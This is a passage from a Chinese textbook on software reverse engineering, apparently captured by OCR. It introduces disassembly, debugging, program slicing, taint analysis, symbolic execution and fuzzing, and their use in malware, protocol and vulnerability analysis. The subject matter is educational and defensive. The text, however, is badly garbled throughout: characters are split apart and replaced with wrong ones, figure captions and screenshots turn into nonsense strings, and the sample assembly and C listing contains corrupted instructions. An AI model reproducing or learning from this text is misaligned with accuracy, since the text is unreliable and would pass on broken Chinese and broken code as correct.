何 提取 庞大 的 数据 之 间 .指令 之 间 的 依赖 关系 ,并 让 分 析 人 员 有 直观 的 认识 ,是 软件 分 析 
需要 解决 的 另 一 个 关键 难题 。 

(3) 复杂 逮 辑 的 解析 。 程 序 中 所 有 指令 并 非 简单 的 顺序 执行 ,其 变量 的 计算 、 指 令 的 
执行 都 依赖 严格 的 好 辑 关系 ,而 当前 软件 的 运行 好 辑 越 来 越 复 杂 , 如 何 准确 地 提取 复杂 的 
程序 逻辑 ,并 对 复杂 的 逻辑 进行 分 析 求解 是 支撑 软件 分 析 的 关键 环节 ,也 是 当前 孤 须 解 
决 的 关键 问题 。 


1.4. 主要 方法 与 技术 


软件 逆向 分 析 并 不 是 一 种 单项 技术 ,其 涉及 的 技术 和 方法 很 多 。 按 照 分 析 方 式 的 不 
同 ,可 以 将 软件 逆向 分 析 分 为 静态 和 动态 两 大 类 。 静 态 分 析 主 要 是 直接 对 软件 的 可 执行 
代码 进行 分 析 ,一 般 是 在 对 代码 反 汇 编 或 反 编译 的 基础 上 ,对 汇编 代码 或 其 他 高 级 语言 代 
码 进行 进一步 的 分 析 。 静 态 分 析 的 优势 是 可 以 对 软件 代码 进行 较为 全 面 的 整体 性 分 析 。 
它 的 缺点 是 : 由 于 对 代码 的 任何 分 析 都 依赖 于 在 代码 解析 基础 上 的 推理 完成 ,造成 其 难 
以 分 析 较 大 规模 、 复 杂 的 软件 代码 ;另外 ,若是 软件 有 加 这 等 保护 手段 ,由 于 无 法 反 汇编 或 
反 编译 ,也 无 法 进行 静态 分 析 。 动 态 分 析 是 通过 直接 运行 软件 ,然后 监测 软件 运行 过 程 ， 
实施 分 析 。 动 态 分 析 的 优势 是 : 分 析 过 程 中 可 根据 软件 的 运行 过 程 直接 获得 在 各 个 指令 
执行 后 的 结果 数据 ,减少 分 析 中 的 推理 分 析 过 程 ,分 析 过 程 的 复杂 度 更 低 ,准确 性 更 高 。 
其 最 大 的 问题 是 每 次 分 析 只 能 针对 动态 执行 的 一 条 路 径 进行 ,分 析 的 全 面 性 较 差 。 因 此 ， 
如 何 构造 执行 多 条 路 径 , 尽 可 能 多 地 覆盖 软件 代码 和 潜在 路 径 , 也 是 当前 动态 逆向 分 析 中 
关注 的 重点 问题 之 一 。 

在 实际 分 析 过 程 中 ,为 了 充分 利用 静态 、 动 态 分 析 的 优势 ,弥补 各 自 的 不 足 , 往 往 将 相 
关 技 术 交 又、 融合 使 用 ,当前 的 主流 思路 是 以 动态 分 析 为 主 ,一 方面 利用 模糊 测试 等 技术 
构造 执行 的 不 同 路 径 , 另 一 方面 也 利用 静态 分 析 手 段 弥 补 动态 分 析 过 程 中 的 不 足 , 优 化 和 
提升 动态 分 析 的 能 力 。 

根据 逆向 分 析 获 得 信息 的 层次 不 同 , 又 可 以 将 软件 逆向 分 析 方 法 与 技术 分 为 获取 代 
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码 的 反 汇编 . 反 编译 等 ,程序 依赖 关系 分 析 的 程序 切片 ,污点 传播 分 析 、 符 号 执行 等 。 下 面 
各 节 简 要 介绍 各 项 方法 和 技术 。 


141 反 汇 编 与 反 编 译 


软件 逆向 分 析 就 是 在 帮助 用 户 理解 程序 实现 机 理 的 基础 上 从 不 同 角度 对 程序 进行 分 
析 。 而 反 汇 编 与 反 编 译 则 是 软件 逆向 分 析 的 第 一 步 , 即 将 完全 不 可 读 的 二 进 制 可 执行 程 
序 转变 为 用 户 基 本 可 读 、 功 能 等 价 的 汇编 代码 或 其 他 高 级 语言 代码 。 当 然 , 对 于 现在 的 软 
件 而 言 ,仅仅 获得 这 些 代码 是 不 够 的 ,往往 要 对 其 进行 进一步 深度 分 析 , 但 反 汇 编 或 反 编 
译 通常 是 逆向 分 析 的 第 一 步 , 无 论 是 对 于 静态 分 析 而 言 还 是 对 于 动态 分 析 而 言 。 

汇编 语言 是 一 种 低级 语言 ,对 应 不 同 的 计算 机 体系 结构 ,汇编 语言 有 不 同 的 指令 集 ， 
而 不 像 其 他 高 级 语言 那样 可 以 适用 于 不 同 的 系统 平台 。 基 于 汇编 语言 开发 的 程序 代码 通 
过 汇编 器 转换 为 机 器 可 执行 的 机 器 码 ,将 汇编 程序 代码 转换 为 机 器 可 运行 的 执行 代码 的 
过 程 就 称 为 汇编 ;而 反 汇编 就 是 汇编 过 程 的 逆 过 程 ,即将 可 执行 代码 转换 为 可 读 的 汇编 代 
码 。 汇 编 与 反 汇编 的 例子 如 图 1-9 所 示 。 反 汇编 既 可 以 根据 可 执行 代码 文件 执行 静态 反 
汇编 ,也 可 以 根据 程序 动态 过 程 执行 的 每 一 条 指令 进行 动态 反 汇 编 , 因 此 , 它 是 当前 开展 
软件 逆向 分 析 工 作 的 一 项 基础 性 很 强 的 工作 。 当 前 ,除了 有 一 些 DA Pro 等 成 熟 的 分 析 
工具 (图 1-100 ,也 有 一 些 用 于 二 次 开发 的 第 三 方 引擎 ,比如 Udis86。 











十 六 进 制 可 执行 代码 汇 码 代码 C 语 言 
int main(int argc, char *argv[]) 
55 push ebp { 
8BEC mov ebp, esp signed int i; 
8B 4D OC mov ex, [ebp*argv] 
33 C0 xor eax, eax i=0; 
8B 5104 mov edx, [ecx+4] do( 
81EA 00 21 40 00 sub edx, offset aUdb c zargv[1]li]; 
8A8C 02 0021 40 00 mov cl byte ptr ds:aUdb[edx + eax) 
FECI inc cl c=c+1; 
3A 88 00 21 40 00 cmp cl, byte ptr ds:aUdb[eax] if( c !=aUdb{i) ) 
7506 jnz short loc_401028 break; 
40 inc eax +i 
83F8 03 cmp eax, 3 
7C E9 j short loc_401011 )while( i«3) 
83F8 03 cmp eax, 3 if(i==3) 
750E jnz short loc, 401038 printf("Crack Success! n"); 
6804 214000 push offset Format 
FF15 90 20 40 00 callds; imp  printf 
B801 00 00 00 move eax 1 return 1 
5D pop ebp 
ca retn 
$ 








图 1-9 二 进 制 代码 的 反 汇 编 与 反 编 译 
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图 1-10 IDA Pro 反 汇 编 界面 


反 汇 编 之 后 的 汇编 代码 读 起 来 仍 是 困难 的 ,但 实际 上 纯粹 利用 汇编 语言 编程 序 也 是 
相当 困难 的 。 因 此 ,后 续 设 计 出 了 Ci n Pascal, C+ 、C# Java 等 高 级 语言 。 而 将 这 
些 高 级 语言 (原始 语言 ) 程 序 代码 转换 成 另外 一 种 编程 语言 (目标 语言 ) 代 码 的 过 程 就 称 为 
编译 ,例如 将 C 语言 转换 为 汇编 代码 、 机 器 码 等 。 而 反 编译 则 是 这 个 过 程 的 逆 过 程 ,即将 
机 器 码 、 汇 编 代 码 转 换 成 高 级 语言 (比如 C 语言 代码 .Java 代码 等 ,如 图 1-11 所 示 ) 的 逆向 
f, Java EA FH JD, Jad, Jode 等 反 编译 器 。JD 是 Java Decompiler 的 简称 ,其 提供 
的 JD-GUI 软件 具有 可 视 化 的 反 编译 功能 ,能 够 将 Java 字 节 码 转 换 成 与 源码 相近 的 Java 
语言 ,涵盖 详尽 的 package 包 、 类 名 、 函 数 名 以 及 参数 变量 类 型 。 由 于 程序 在 编译 ,代码 优 
化 过 程 中 会 丢失 一 定 的 代码 结构 信息 ,程序 编译 过 程 并 不 是 一 个 完全 可 道 的 过 程 ,特别 是 
对 于 常用 的 C.C++ 等 高 级 语言 设计 的 软件 ,其 编译 和 代码 优化 过 程 中 ,一 些 数据 结构 信 
E, ,代码 模块 划分 等 信息 会 丢失 。 因 此 ,大 量 的 软件 在 逆向 分 析 过 程 中 并 不 能 完全 恢复 出 
设计 阶段 的 高 级 语言 代码 。 

虽然 反 汇编 . 反 编译 仍然 面临 很 多 问题 有 待 解决 .但 当前 已 有 的 技术 工具 已 经 比较 成 
熟 , 且 应 用 比较 广泛 ,因此 在 本 书 中 对 其 具体 的 理论 、 方 法 和 技术 不 做 重点 阐述 。 在 相关 
的 分 析 工 作 中 将 大 量 用 到 反 汇 编 工 具 , 因 此 ,将 在 第 3 章 中 简单 介绍 常见 的 反 汇编 工具 和 
具体 的 使 用 方法 。 更 全 面 的 汇编 语言 ,编译 过 程 、 反 汇编 方法 等 问题 可 参考 其 他 书籍 。 


142 程序 调试 
程序 调试 是 通过 实际 运行 软件 ,利用 断 点 、 单 步 执行 等 方式 对 软件 执行 过 程 进 行 细 粒 


Ve/ 软件 安全 分 析 与 应 用 


Navigate Search Help 
EU SEE 














lic MEANS reanec Srt Iu 
throvs IoExceptics 


t 
this(iaput, mall); 
1 


Mrs opum gps | 
istius, t, 
D 


Wikis mre peas luy, Belag recti Mem Teen Ù 
this(input, 1024, encoding) 


et pannie ARInparsrrean(Irpur Stream E ding) throws loFxcepron { 
A! ce inpet, 10E ue, SEM emendi taot 1orzeepron 
Ere 2|  this(input, size, 1924, encoding); 

D 


n 
TA s ——— 
DD MissingTokenExcoption 
© [À NewiabieAhExeepen 
P-D Parser 
(aH pareerRuleRerurnscope 

















图 1-11 JD 反 编译 界面 


度 分 析 的 过 程 。 程 序 调试 技术 是 软件 动态 逆向 分 析 的 重要 技术 手段 之 一 ,但 其 提出 之 初 
并 非 主要 应 用 于 软件 的 逆向 分 析 , 而 主要 应 用 于 程序 开发 过 程 中 的 错误 修正 。 目 前 ,程序 
调试 技术 已 经 成 为 软件 动态 道 向 分 析 最 基础 的 技术 手段 之 一 ,特别 是 对 软件 功能 的 局 部 、 
深度 分 析 具 有 重要 作用 。 

一 般 性 的 应 用 软件 调试 借助 于 WinDbg( 图 1-12(a)) 等 工具 软件 就 可 以 实现 ,其 基本 
原理 是 ,利用 CPU 的 调试 功能 ,将 应 用 软件 在 调试 模式 下 运行 ,通过 工具 ,用 户 可 对 应 用 
软件 执行 过 程 进行 设置 断 点 单 步 执 行 .提取 环境 变量 (如 寄存 器 ) 等 操作 。 用 户 可 以 借助 
以 上 手段 对 程序 运行 过 程 中 的 每 一 条 指令 执行 之 后 的 状态 做 进一步 分 析 。 

对 于 操作 系统 驱动 程序 等 内 核 代 码 的 调试 则 较为 复杂 ,需要 借助 于 SoftICE 
(图 1-12(b)) 或 者 VMWare 十 WinDbg 等 调试 工具 ,其 与 一 般 应 用 软件 调试 的 主要 区 别 
在 于 会 阻塞 整个 操作 系统 的 继续 运行 ,包括 运行 于 该 系统 内 的 调试 程序 ,因此 成 熟 稳定 的 
内 核 的 调试 需要 多 台 设 备 进行 连接 调试 或 者 结合 虚拟 化 技术 。 

与 传统 的 静态 分 析 方法 相 比 ,程序 调试 的 优点 在 于 它 可 以 避免 用 户 对 指令 的 复杂 推 
理 分 析 过 程 ,可 以 直接 对 每 条 指令 的 执行 结果 进行 分 析 。 但 它 也 有 很 大 的 局 限 性 : DOE 
具有 动态 分 析 的 共性 缺陷 , 即 每 次 分 析 只 能 分 析 一 条 执行 路 径 , 全 面 性 较 差 ; @ 软 件 自 保 
护 技术 的 应 用 可 能 阻碍 调试 , 即 软件 不 允许 运行 在 调试 状态 下 ,否则 会 退出 甚至 自 销毁 ， 
相关 技术 在 一 些 软件 的 版 权 保护 方案 和 恶意 代码 的 防 分 析 方 案 中 应 用 非常 普遍 ; @ 调 试 
仅 能 提供 动态 的 细节 信息 ,对 用 户 而 言 , 分 析 、 理 解难 度 仍 很 大 ,程序 调试 获得 程序 实际 动 
态 执行 的 指令 之 后 ,首先 仍然 是 做 反 汇 编 . 用 户 也 可 以 获取 指令 执行 之 后 的 寄存 器 等 环境 
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(a) 应 用 软件 调试 工具 WinDbg (b) 内 核 代码 调试 工具 SoftICE 
图 1-12 调试 工具 界面 


状态 ,但 这 些 信息 对 于 分 析 人 员 来 说 ,无 论 是 数据 量 还 是 复杂 度 都 仍然 是 巨大 的 挑战 。 
143 程序 切片 


程序 切片 最 初 由 M. Weiser 于 1979 年 在 其 博士 论文 中 提出 , 它 是 解决 软件 超大 规模 
所 带 来 的 理解 困境 的 重要 思路 ,是 一 种 重要 的 程序 "分解 " 方 法 。 它 主要 通过 分 析 程 序 代 
码 之 间 的 依赖 关系 来 分 析 指 令 的 相关 性 ,从 而 帮助 用 户 提 取 其 所 * 感 兴趣 ”的 代码 片段 。 
它 根据 用 户 所 关注 的 指令 和 指令 相关 的 操作 数 ,提取 与 该 指令 及 操作 数 相关 联 的 代码 ,从 
而 在 软件 逆向 分 析 过 程 中 减少 其 他 无 关 代码 的 干扰 。 

例如 ,在 图 1-13 中 ,(a) 为 完整 的 汇编 代码 ,分 析 者 关注 影响 最 后 一 条 指令 mov eax， 
[Lebp-0x14] 的 相关 指令 记录 ,采用 基于 数据 流 的 逆向 切片 分 析 技 术 , 分 析 每 条 指令 的 源 地 
址 和 目的 地 址 ,根据 实际 的 数据 流 关系 裁剪 出 (b) 中 标 出 的 相关 指令 。 根 据 这 些 指令 ,可 
以 进一步 分 析出 eax 的 计算 表达 式 : eax—eax * 8 一 2。 相 关 详 细 内 容 在 第 4 章 中 将 详细 
介绍 ,这 里 暂 不 展开 。 

程序 切片 既 可 以 用 于 程序 的 源 代码 分 析 , 也 可 以 用 于 对 可 执行 代码 反 汇 编 得 到 的 汇 
编 代 码 进行 分 析 , 考 虑 到 逆向 分 析 的 应 用 场景 ,本 书 中 将 主要 介绍 针对 汇编 代码 的 切片 方 
法 。 当 前 ,针对 汇编 代码 的 专用 切片 工具 比较 少 ,但 在 很 多 工具 中 作为 一 个 插件 或 独立 的 
功能 提供 ,比如 Panda, Bitblaze 系统 等 。 

程序 切片 主要 用 于 程序 的 静态 分 析 , 也 可 适用 于 动态 分 析 场 景 ,差异 在 于 静态 分 析 是 
通过 计算 各 操作 数 可 能 影响 的 范围 来 计算 指令 的 关联 关系 ,需要 考虑 各 种 可 能 的 执行 路 
径 , 而 动态 分 析 则 针对 具体 的 执行 路 径 、 具 体 的 操作 数 来 分 析 指 令 与 指令 之 间 的 依赖 关 
系 。 动 态 程序 切片 的 作用 和 价值 和 1. 4.4 节 介 绍 的 污点 传播 分 析 具 有 相似 之 处 。 

程序 切片 的 理论 已 经 相对 成 熟 , 但 在 实际 分 析 过 程 中 ,往往 由 于 对 于 影响 范围 的 计算 
误差 造成 指令 影响 范围 的 扩散 ,从 而 造成 性 能 和 准确 性 均 受 到 影响 。 因 此 ,程序 切片 是 当 
前 用 于 局 部 代码 片段 分 析 的 一 种 重要 的 手段 ,但 仍 不 太 适 合 于 大 规模 代码 的 分 析 。 
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(a) 汇编 代码 (b) 切片 结果 
图 1-13 程序 切片 
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污点 传播 分 析 是 一 种 重要 的 数据 流 分 析 方 法 ,其 基本 思想 是 : 将 所 感 兴趣 的 数据 做 
标记 (如 同 染色 一 样 ), 即 标记 为 污点 数据 ,然后 通过 分 析 对 该 污点 数据 的 处 理 过 程 ,根据 
每 条 指令 的 污点 传播 规则 ,分 析 数 据 的 传递 关系 。 数 据 传递 .扩散 的 过 程 就 是 污点 传播 过 
程 。 污 点 传播 分 析 一 般 采 取 动 态 分 析 方式 ,其 可 以 根据 具体 的 指令 和 对 应 的 操作 数 直接 
分 析 污 点 传播 的 过 程 ,因此 是 一 种 相对 准确 、 高 效 的 动态 数据 流 分 析 方 法 ,如 图 1-14 
所 示 。 

动态 污点 传播 在 实现 方式 上 分 很 多 种 ,其 主要 的 差异 在 于 如 何 获 得 动态 执行 过 程 中 
具体 每 一 条 指令 和 指令 执行 前 后 状态 。 当 前 主要 的 实现 方式 有 基于 插 桩 、 基 于 硬件 、 基 于 
编译 器 扩展 和 基于 硬件 模拟 器 等 实现 方法 。 目 前 动态 污点 传播 方面 也 已 有 众多 较为 成 熟 
的 系统 ,比较 有 代表 性 的 有 TEMU、DECAF、AOTA 等 。 基 于 硬件 模拟 器 的 实现 方案 是 
目前 应 用 最 多 的 方案 ,采用 该 方案 兼顾 了 性 能 和 可 扩展 性 问题 。 

动态 污点 传播 分 析 目 前 已 经 广泛 应 用 于 漏洞 挖掘 .恶意 软件 分 析 等 工作 中 ,但 当前 其 
最 大 的 问题 是 在 实际 分 析 过 程 中 面临 的 隐 式 污点 传播 问题 ,由 于 控制 依赖 . 查 表 操作 等 引 
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明文 作为 污点 简单 加 密 过 程 
Encrypt(msg , key) "e 





mov eax, key, 


mov ebx, msg; 





buf = msg ©® key 


xor cw 
d mov buf, ebx 
Send ( buf ) hU 


污点 传播 过 程 
图 1-14 动态 污点 传播 分 析 实 例 

















入 的 隐 式 污点 传播 无 法 简单 地 引入 或 去 除 , 直 接 影 响 到 了 分 析 的 准确 性 ,而 相关 的 问题 在 
实际 代码 中 也 相当 普遍 ,相关 问题 将 在 第 5 章 中 详细 分 析 。 
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符号 执行 是 分 析 程序 内 部 迎 辑 的 一 种 基础 方法 ,符号 执行 在 软件 逆向 分 析 过 程 中 常 
用 于 路 径 约束 条 件 的 分 析 。 其 基本 思想 是 将 目标 程序 代码 中 部 分 变量 和 运算 符号 化 , 通 
过 对 各 种 条 件 分 支 的 符号 化 表达 来 形成 路 径 的 约束 条 件 。 

符号 执行 同样 是 一 种 数据 流 分 析 方法 ,其 基本 思想 是 : 用 符号 变量 作为 输入 参数 ,对 
程序 进行 模拟 执行 ,然后 对 程序 的 执行 路 径 进行 分 析 , 并 提取 路 径 中 的 约束 条 件 , 通 过 对 
约束 进行 求解 实现 对 程序 安全 性 及 路 径 可 达 性 等 分 析 。 相 比 于 模糊 测试 等 软件 测试 方 
法 ,符号 执行 方法 的 针对 性 更 强 。 符 号 执行 的 实例 如 图 1-15 所 示 。 


pc: 路 径 条 件 一 一 一 




















int x,y; [PC: 真 ] x=X ,y=Y 
if(x>y){ i 
uk [PCH] X5 Y? 
x-x-y KR 
if (x>y) [PC:X<Y] 结束 [PC:X>Y] x=X+Y 
assert false: 




















[PC:X>Y] x=X+Y-Y=X 








[PC:X>Y] x=X+Y-X=Y 














[PC:X>Y] Y>X? 











真 
[PCX»Y^Y€X] 结束 [PCX»Y'Y»X] 结束 
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错误 ! 
图 1-15 符号 执行 实例 


传统 的 符号 执行 使 用 静态 分 析 方 法 ,虽然 精确 度 高 ,但 测试 效率 较 低 。2005 年 提出 


的 动态 符号 执行 方法 结合 了 具体 执行 与 符号 执行 的 优势 ,在 提高 效率 的 同时 , 尽 可 能 地 保 
证 了 测试 的 准确 性 。 当 前 为 了 解决 符号 执行 中 的 路 径 爆 炸 等 问题 ,研究 人 员 又 提出 了 并 
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行 符 号 执行 .选择 符号 执行 等 方法 ,并 在 实际 测试 过 程 中 取得 了 不 错 的 效果 。 由 于 近年 来 
在 科学 研究 中 取得 了 显著 的 效果 .符号 执行 方法 正 逐 渐 得 到 各 软件 生产 厂商 的 认可 ,并 被 
逐步 引入 软件 的 自动 化 测试 环节 。 有 关 符 号 执行 方法 的 技术 细节 会 在 后 面 的 章节 中 进行 
说 明 。 
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模糊 测试 准确 地 说 并 不 是 一 项 逆向 分 析 技 术 , 它 最 初 的 应 用 主要 是 为 了 通过 构造 各 
种 畸形 的 数据 输入 来 测试 软件 实现 的 正确 性 。 但 由 于 软件 逆向 分 析 越 来 越 多 地 借助 于 动 
态 分 析 的 技术 手段 ,而 动态 分 析 最 大 的 问题 就 是 每 次 分 析 只 能 分 析 单 一 的 执行 路 径 ,分 析 
的 全 面 性 差 。 而 模糊 测试 的 主要 用 途 就 是 尽 可 能 多 地 触发 软件 的 各 种 执行 路 径 , 它 弥补 
了 软件 动态 逆向 分 析 的 缺陷 。 

模糊 测试 的 基本 思想 就 是 : 通过 构造 各 种 不 同 的 输入 数据 , 尽 可 能 地 触发 执行 软件 
的 各 种 路 径 , 通 过 对 执行 结果 的 监测 来 实现 相关 的 分 析 或 检测 目标 。 对 于 不 同 的 分 析 目 
标 , 可 能 会 采取 不 同 的 数据 构造 方式 和 不 同 的 结果 验证 方式 。 例 如 ,软件 漏洞 分 析 尽 可 能 
构造 可 能 造成 软件 错误 的 畸形 数据 ,并 将 这 些 畸 形 数据 实际 输入 软件 动态 运行 ,验证 软件 
对 这 些 特 殊 数 据 的 处 理 是 否 正确 ;而 恶意 软件 机 理 分 析 则 是 尽 可 能 地 构造 可 能 的 控制 命 
令 方式 ,以 触发 其 所 有 的 功能 。 

模糊 测试 在 软件 工程 的 开发 测试 过 程 中 应 用 广泛 ,当前 已 有 相对 成 熟 的 技术 和 系统 ， 
这 方面 有 代表 性 的 工具 包括 Peach Sulley 等 。 同 时 ,考虑 到 软件 规模 显著 增 大 的 趋势 导 
致 测试 数据 的 规模 也 迅速 增 大 ,现在 主流 的 模糊 测试 工具 也 越 来 越 多 地 支持 并 行 的 测试 
过 程 。 图 1-16 为 并 行 化 模糊 测试 工具 的 界面 ,通过 该 界面 进行 新 任务 创建 和 任务 管理 ， 
同时 可 以 监测 到 各 个 节点 的 资源 使 用 状态 。 








图 1-16 ”模糊 测试 工具 界面 
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从 模糊 测试 的 原理 可 以 看 出 , 它 在 某 种 程度 上 是 一 种 “暴力 ”测试 模式 , 即 通过 尝试 各 
种 可 能 的 输入 数据 来 发 现 问 题 。 而 由 于 软件 输入 数据 的 复杂 性 ,这 种 “可 能 的 输入 数据 ” 
规模 非常 庞大 ,而 且 对 于 每 个 可 能 的 输入 数据 项 均 要 动态 运行 验证 ,效率 也 比较 低 。 虽然 
当前 已 有 很 多 对 测试 数据 生成 进行 优化 的 方法 ,但 仍 未 能 从 根本 上 解决 模糊 测试 的 效率 
问题 。 如 何 提高 测试 数据 生成 的 针对 性 ,从 而 提高 模糊 测试 效率 ,是 当前 模糊 测试 研究 的 
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防 双方 实力 的 重要 基础 能 力 之 一 。 因 此 ,软件 逆向 分 析 既 被 广泛 应 用 于 攻击 者 的 破坏 ,也 
被 防御 者 广泛 应 用 于 安全 防御 手段 的 研发 .漏洞 的 发 现 与 修补 等 工作 中 。 下 面 将 简单 介 
绍 几 种 典型 的 应 用 场景 。 


15.1 恶意 软件 分 析 


恶意 软件 是 对 病毒 ,木马 .僵尸 程序 等 具有 恶意 功能 的 软件 或 代码 的 统称 ,对 恶意 软 
件 的 检测 与 防御 是 网 络 空间 安全 的 重要 内 容 之 一 。 随 着 网 络 攻击 专业 化 、 组 织 化 和 利益 
化 的 发 展 趋势 ,恶意 软件 采取 的 技术 手段 越 来 越 先进 ,攻击 的 针对 性 、 破 坏 性 越 来 越 强 , 特 
别 是 APT 攻击 的 出 现 , 使 得 这 一 特点 尤为 突出 。 

当 攻 击 者 投放 的 恶意 软件 第 一 次 被 发 现时 ,往往 要 对 其 进行 深入 的 分 析 。 分 析 主 要 
实现 以 下 目标 : 分 析 其 主要 功能 ,评估 其 危害 ; @ 分 析 其 关键 代码 和 关键 行为 ,提取 代 
码 特 征 或 行为 特征 ,以 更 新 杀毒 软件 、 入 侵 检 测 系 统 等 防御 系统 配置 ,实现 对 该 恶意 软件 
的 防御 能 力 ; @ 分 析 其 实现 机 理 , 研 发 恶意 软件 清除 手段 。 

从 以 上 应 用 场景 可 以 看 出 ,恶意 软件 的 分 析 过 程 是 不 可 能 依赖 于 源 代码 的 ,因此 ,对 
恶意 软件 的 分 析 只 能 依赖 于 软件 逆向 分 析 , 但 在 实际 分 析 过 程 中 ,由 于 恶意 软件 的 研发 团 
队 往 往 也 具有 很 强 的 软件 逆向 分 析 能 力 ,他 们 很 清楚 恶意 软件 的 逆向 分 析 过 程 和 手段 , 因 
此 ,往往 会 在 恶意 软件 实现 中 采取 一 些 技术 保护 手段 ,比如 反 调 试 .加 壳 等 。 当 然 ,恶意 软 
件 考虑 到 其 实战 的 需要 ,也 不 可 能 设计 得 过 于 复杂 和 庞大 。 

当前 针对 恶意 软件 逆向 分 析 的 工具 比较 多 ,比如 radare. 它 是 一 个 开源 的 命令 行 形式 
的 二 进 制 代码 分 析 框 架 ,支持 Windows、Linux 等 操作 系统 。radare 框架 在 架构 上 采用 了 
很 多 * NIX 系统 的 基本 理念 ,包括 将 任何 对 象 都 视 为 文件 ,通过 输入 输出 将 独立 的 小 工 
具 组 合 在 一 起 ,以 及 保持 简洁 。radare 框架 以 一 个 十 六 进 制 编辑 器 为 核心 ,包含 很 多 实用 
的 命令 行 工具 ,包括 汇编 器 、 反 汇编 器 ,代码 分 析 、 脚 本 支持 、 代 码 和 数据 可 视 化 等 工具 。 


152 网 络 协议 逆向 分 析 


当前 网 络 空间 中 的 绝 大 多 数 应 用 都 要 依赖 于 网 络 和 网 络 协议 。 因 此 ,对 应 用 软件 的 
网 络 协议 逆向 分 析 是 恶意 软件 检测 与 防御 、 软 件 安全 性 评估 等 工作 的 基础 性 支撑 。 例 如 ， 
对 于 僵尸 网 络 的 检测 与 抑制 ,其 关键 就 在 于 掌握 其 网 络 通信 协议 ,从 而 掌握 其 网 络 通信 特 
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征 ,设计 抑制 机 制 。 而 僵尸 网 络 由 于 其 破坏 性 目的 ,其 控制 协议 是 不 会 公开 的 ,只 能 通过 
逆向 分 析 获 得 。 

当然 ,对 于 一 系列 公开 的 协议 ,同样 也 有 逆向 分 析 的 需求 。 比 如 ,对 于 “心脏 滴 血 ” 
(HeartBleed) 漏 洞 ,其 虽然 是 公开 标准 协议 TLS/SSL 的 一 个 实现 ,但 在 实现 代码 中 出 现 
了 错误 ,引入 了 漏洞 。 因 此 ,要 发 现 这 些 问 题 , 对 软件 实现 的 安全 性 进行 评估 ,对 网 络 协议 
进行 逆向 分 析 是 开展 工作 的 前 提 。 

协议 逆向 分 析 有 很 多 种 ,有 基于 网 络 流量 统计 特征 展开 分 析 的 ,也 有 直接 通过 逆向 软 
件 进 行 分 析 的 。 相 比较 而 言 , 后 者 分 析 的 准确 性 更 高 ,分 析 能 力 更 强 。 基 于 软件 逆向 分 析 
的 协议 实现 分 析 的 基本 思路 是 : 结合 协议 实现 代码 的 静态 ,动态 逆向 分 析 , 提 取 网 络 协议 
中 数据 包 格式 .关键 字 ,协议 状态 机 等 信息 。 

在 协议 道 向 分 析 方 面 ,目前 已 有 大 量 的 工作 进展 。 例 如 ,Caballero J 和 Song D 提出 
了 一 种 基于 二 进 制程 序 动态 分 析 的 自动 协议 逆向 分 析 方法 ,该 方法 提取 更 加 准确 和 完整 
的 协议 信息 ,通过 应 用 程序 能 够 逆向 分 析出 协议 规范 中 发 送 和 接收 的 消息 格式 和 字段 语 
X ,并 支持 加 密 协议 的 分 析 。 


153 软件 漏洞 分 析 与 利用 


软件 漏洞 是 当前 网 络 空间 安全 的 主要 威胁 之 一 ,攻防 双方 都 非常 关注 软件 漏洞 的 分 
析 与 利用 工作 。 攻 击 者 掌握 了 可 利用 的 漏洞 ,就 掌握 了 一 种 渗透 进入 信息 系统 的 手段 ; 防 
御 者 发 现 了 软件 漏洞 ,就 需要 及 时 剖析 其 机 理 , 研 发 相应 的 防御 措施 。 

软件 漏洞 的 发 现 方式 有 很 多 种 。 例 如 ,通过 模糊 测试 工具 ,不 断 地 尝试 触发 程序 错 
误 ; 通 过 典型 漏洞 的 代码 特征 预先 筛选 潜在 代码 ,再 人 工 进一步 分 析 ; 普 通用 户 在 日 常 使 
用 过 程 中 也 可 能 无 意识 地 和 触发 程序 错误 ,等 等 。 但 无 论 以 什么 方式 发 现 的 漏洞 ,也 无 论 是 
出 于 攻击 破坏 的 目的 还 是 出 于 防御 的 目的 ,都 需要 对 漏洞 的 机 理 做 进一步 分 析 。 在 当前 
大 量 应 用 软件 源 代码 无 法 被 人 们 掌握 的 情况 下 ,软件 逆向 分 析 是 唯一 的 技术 手段 。 

软件 漏洞 分 析 主 要 包括 对 其 形成 机 理 的 分 析 , 对 其 可 利用 性 的 评估 ,以 及 潜在 利用 路 
径 的 分 析 和 设计 等 。 由 于 在 发 现 软 件 漏洞 的 初期 往往 都 是 首先 掌握 了 造成 程序 错误 的 异 
常 输入 ,因此 在 软件 漏洞 分 析 过 程 中 ,对 输入 数据 的 跟踪 分 析 、 路 径 约 束 条 件 的 分 析 等 都 
是 软件 漏洞 分 析 的 重要 内 容 , 这 些 都 需要 借助 于 污点 传播 分 析 、 符 号 执行 等 技术 手段 。 

在 软件 漏洞 分 析 工 作 中 ,对 异常 输入 数据 的 发 现 目 前 已 有 较为 成 熟 的 工具 , 即 模糊 测 
试 攻击 ,包括 Peach, Sulley 等 ,但 在 漏洞 的 分 析 和 利用 方面 ,由 于 软件 及 软件 漏洞 的 多 样 
性 和 复杂 性 ,目前 仍 缺 乏 通 用 的 相关 工具 或 系统 ,软件 漏洞 分 析 工 作 仍 要 借助 于 一 些 基 础 
性 平台 ,比如 动态 污点 传播 分 析 系 统 Temu、Decaf 等 ,符号 执行 分 析 工 具 Z3, KLEE 等 ， 
大 量 的 分 析 工 作 仍 需要 依赖 于 专业 人 员 的 经 验 完成 。 提 高 自动 化 分 析 能 力 一 直 是 软件 漏 
洞 分 析 努 力 的 方向 ,推动 这 方面 的 研究 不 仅 有 利于 提升 软件 漏洞 的 分 析 能 力 和 分 析 效率 ， 
对 于 提升 软件 产品 的 安全 性 也 具有 重要 价值 。 
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1.6 本 书 的 组 织 结构 


161 内 容 范 围 


针对 软件 的 规模 化 、 复 杂 化 带 来 的 逆向 分 析 挑 战 ,本 书 将 重点 围绕 如 何 提高 对 软件 道 
向 分 析 过 程 中 代码 逻辑 的 分 析 和 提取 能 力 展开 ,重点 介绍 软件 逆向 分 析 过 程 中 的 数据 依 
赖 分 析 、 控 制 依赖 分 析 、 路 径 约 束 分 析 等 基础 方法 。 并 结合 相关 的 基础 方法 ,重点 介绍 软 
件 逆向 分 析 在 恶意 软件 深度 分 析 、 软 件 漏洞 分 析 、 网 络 协 议 逆向 分 析 等 工作 上 的 应 用 和 相 
关 技 术 , 而 对 于 软件 破解 .软件 模块 重用 等 问题 ,本 书 未 有 涉及 。 

在 软件 逆向 分 析 方 面 ,当前 的 反 编译 、 反 汇编 .调试 等 技术 和 工具 已 经 相对 成 熟 ,大 部 
分 软件 逆向 分 析 人 员 对 此 已 很 熟悉 ,相关 资料 和 书籍 已 相当 丰富 ,相关 内 容 在 本 书 中 将 不 
